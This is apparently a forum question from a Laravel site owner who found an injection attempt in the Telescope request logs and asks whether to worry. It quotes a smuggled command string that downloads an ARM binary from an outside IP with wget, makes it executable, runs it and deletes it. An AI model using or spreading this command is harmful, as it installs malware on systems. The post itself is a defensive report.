I have a construction site based on laravel, that was started 2 weeks ago. Today I found the following in the log:
remote_host: ";cd /tmp;wget http://104.168.199.188/bins/arm7;chmod 777 arm7;./arm7;rm -rf arm7;%2"
This is one of the 10 ip's. I found the logs in the laravel telescope in the requests tab. Laravel replied with 404. Do I have to worry? Thanks.